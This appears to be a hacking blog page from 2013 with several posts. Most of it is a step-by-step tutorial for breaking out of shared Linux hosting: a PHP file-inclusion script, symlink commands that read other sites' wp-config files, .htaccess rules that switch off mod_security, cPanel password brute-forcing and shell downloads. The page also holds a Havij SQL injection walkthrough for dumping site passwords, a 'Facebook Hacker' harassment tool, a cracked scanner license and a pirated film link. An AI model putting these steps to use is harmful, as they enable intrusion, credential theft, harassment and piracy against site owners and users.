Saturday, 30 November 2013

CRAWL WEBSITE WITH ALBALOO

Asalam o alikum all

Albaloo Web vulnerability scanner ....
Download Link... Server 1 click Here

Server 2 click here Password is :Pakistani

Note:- For Educational Purpose ONLY!

sql injection havij tutorial

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.
One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injectionvery easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Warning - This article is only for education purposes, By reading this article you agree that Hacky Shacky is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

MsSQL 2000/2005 with error.

MsSQL 2000/2005 no error union based

MySQL union based

MySQL Blind

MySQL error based

MySQL time based

Oracle union based

MsAccess union based

Sybase (ASE)

Demonstration
Now i will Show you step by step the process of SQL injection.
Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.

Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:

Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.
Countermeasures:
Here are some of the countermeasures you can take to reduce the risk of SQL Injection

Renaming the admin page will make it difficult for a hacker to locate it
Use a Intrusion detection system and compose the signatures for popular SQL injectionstrings
One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

BYPASS SYMLINK ON LINUX SERVERS BY SEN HACKER

Hello Every One Now I Manoj Nath and I am going to share the Sen Haxor's Tutorial on Bypassing Symlink on 2013 Linux servers :)

    Hi Guys this is Sen
Today i gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods .
So Lets Get Started :)
Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers .
For This First You Need the Following Files :
1 -> Sen Haxor CGI Shell
2 -> sen.zip
3 -> passwd-bypass.php
4 -> Turbo Brute force Cpanel
5 - > Port.py
First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server .
Use the Following Code :
Make a php.ini with the following code
safe_mode=Off
And ini.php with
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
I will post the Download link of the files i use on the end of the tutorial .
So after creating php.ini and ini.php upload the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like
/root/var/www/vhost/
where all sites will be under vhost directory . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files
Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzipthe file and create a symbolic link to root .
Command : unzip sen.zip
Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root
Then You will see this
$ unzip sen.zip
Archive: sen.zip
    linking: sen.txt                 -> /
finishing deferred symbolic links:
sen.txt                -> /
This means a symbolic link has been created to / root .

http://foto.pk/images/2rkr.jpg
Now we need to upload .htaccess use the following
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites .

http://foto.pk/images/3twt.jpg
BYPASSING SYMLINK ON APACHE AND LITESPEED
Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error
These can be Bypass By Using Different .htaccess individually.
BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers .
First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial
After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755
Then Open the Cgi Shell Login ( Password : senhaxor)
Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of the hackers to bypass 403 forbidden Error .
So before we procced first you need to get all /etc/passwd from the server so that we can find the username and path of where the sites are located .
2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server
so i made a Powerfull Shell which can bypass and get /etc/passwd from the server.
I will also add it to the Downloads.
Upload the /etc/passwd bypasser shell and get all /etc/passwd
Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target
Step 1 : ln -s / root
Step 2 : ln -s /home/username/public_html/config.php 1.shtml
Example if our site is www.site.com and username is site and its Wordpress
ln -s /home/site/public_html/wp-config.php 1.shtml
So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code :
Options +FollowSymlinks
DirectoryIndex itti.html
RemoveHandler .php
AddType application/octet-stream .php
Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config .
This is the common way of Bypass 403 forbidden and Litespeed .
Now Let Me Explain You the Advanced Method =)
Method 2 : Bypassing Symlinked Config From Cpanel
For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel .
First Run This Command : ls /var/mail
Then you will be displayed with all username from the server Copy all .
Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads).
Open the Script and in User Paste all the username we got .
And for Password here is the wordlist :

Click here

Copy All and Paste it on Password Select Simple and Click Submit
If Your lucky you will be displayed with cracked cpanels.
Once you got a cpanel on the server You can Bypass 500 Internel Server Error 403 Forbidden Error From Port :2077 and From error-pages from file manager.
Just symlink the config
ln -s /home/user/public_html/wp-config.php config.shtml
Login to the cpanel
Then Go to File Manager -> Error Pages
Then Choose any of these according to what error is triggered when you open your symlinked config
400 (Bad request)
    401 (Authorization required)
    403 (Forbidden)
    404 (Not found)
    500 (Internal server error)
Example "&file=400.shtml&desc=(Bad request)
we can get the config by
"&file=config.shtml& desc=(Bad request)
BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can just login to port 2077
Then public_html/path/config.shtml
You will be able download the config.shtml and you can view the source .
Method 3 : Symlink Bypass via Open Port using Python
For this First we Python to be Installed on Server.
To check if Python is installed run this command python -h
If its install we can use the following python script and Bypass
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://site.com :" + str(port))
httpd.serve_forever()
I have added the script to downloads .
Now Upload the script to the shell

http://foto.pk/images/205cjg3.jpg

now run this command : python port.py

http://foto.pk/images/2je1wqq.jpg

Now Open the site with port 13123
www.site.com:13123

http://foto.pk/images/j5ifwm.jpg
Server Bypassed From Open Port .
Method 4 : Bypassing Symlink Using .ini Method
Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension .
ln -s /home/user/public_html/wp-config.php config.ini
now go to the shell and make a new file a.shtml
Paste the following code inside it and save it

and save it .
Now open the a.shtml in the browser and right click and view the source . Done Bypassed
Method 5 : Bypassing Symlink Using ReadMe file
Make a new directory in your shell From the Cgi shell normally symlink the config
ln -s /home/user/public_html/config.php config.txt
now make .htaccess with the following code .
.htaccess
Options All
ReadMeName config.txt
Now when you open the directory on the browser you will be displayed with the config source directly .
eg : site.com/sen/config.txt is your symlinked config then when you open
www.site.com/sen/ you symlinked config will be displayed as a ReadMe content .
Thats it i have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess
1 - > .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
2 -> .htaccess
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
3 -> .htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
4 -> .htaccess
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble
</ ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType
application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py

This one is to make perl work :

.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl

This one is to enable Symlink if the function is disabled in the server :

.htaccess
<Directory "/home"> *** Options -ExecCGI* ***
AllowOverride
AuthConfig Indexes
Limit FileInfo
Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</ Directory>

This one is to retrieve users permissions :

.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html

Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

Change php version:
.htaccess
AddType application/x-httpd-php4 .php

Bypass Uploads Options and upload shell in another extension :

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>

Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :

www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar

So thats it i think i had covered everything thats related to Bypass Symlink and Disabled Functions on Server . If you still face Problem in Symlink Contact me :

on our page onlinetrickx

FREE DOWNLOAD FACEBOOK HACKER

Free Download Facebook Hacker:

Well, Facebook Hacker is a multi-functional software used to hack facebook account. Actually, you can't hack facebook password, but yes, cause many nuisance and pranks by using this Facebook Hacker software. Follow the guidelines below to free download Facebook Hacker software.

1. Free download Facebook Hacker software.
http://adf.ly/PpLSG

2. Now, run Facebook Hacker.exe file to see:

Login to your Facebook account and then hit on OK at right bottom.

3. Now, Facebook Hacker options are displayed as shown:

4. In Victim pane at left bottom, enter the facebook ID of the victim you wanna hack in User ID field.

5. Now, using this Facebook Hacker software you can:
- Flood wall of victim.
- Spam his message box.
- Comment on him like crazy.
- Poke him and even add mass likes.

Thus, you can play such pranks with your friends using this Facebook Hacker. So, free download Facebook Hacker and trick out your friends.

I have tried this Facebook hacker software and found working perfect for me. If you have any problem to freedownload Facebook Hacker, please mention it in comments.

ACUNETIX WEB VULNERABILITY SCANNER V8 + PATCH

First got to this link and download acunetix scanner

http://www.acunetix.com/download/fullver8

ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q

Then install it do not open it

If opened Closed it :P

Open patch and click on patch

Now open Acunetix you will be asked for some details

Enter below details

License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name:         Hmily/[LCG]
ComPany:      Www.52PoJie.Cn
Email:        Hmily@Acunetix.com
Telephone:    110

Patch Link

http://adf.ly/PpM1p

New and update working patch 100%
http://adf.ly/PpLvL

anti trust

HACKERS 3 - ANTITRUST (2001) DVDRIP XVID

Storyline:

Milo is an idealistic young computer genius with an artist girlfriend and a golden future. He's about to launcha start-up company with his friend Teddy, when he's recruited by NURV, a multi-billion dollar corporation, run by his professional hero, Gary Winston. When Winston takes a personal interest in Milo, he soon caught up in the exciting challenge of realizing Winston's vision. Winston is an inspired mentor and no problem remains unsolved for long, but new developments are brought to Milo with such speed and frequency, he begins to doubt their source. Tragedy strikes and Milo's doubts become suspicions. It looks as if the company will stop at nothing to win. He investigates and the consequences become more and more unnerving, until there is no one left to trust and this twenty-first century David stands alone against Goliath.

Info: http://www.imdb.com/title/tt0218817/

Download: Click Here

HACKERS 3 - ANTITRUST (2001) DVDRIP XVID

Download: Click Here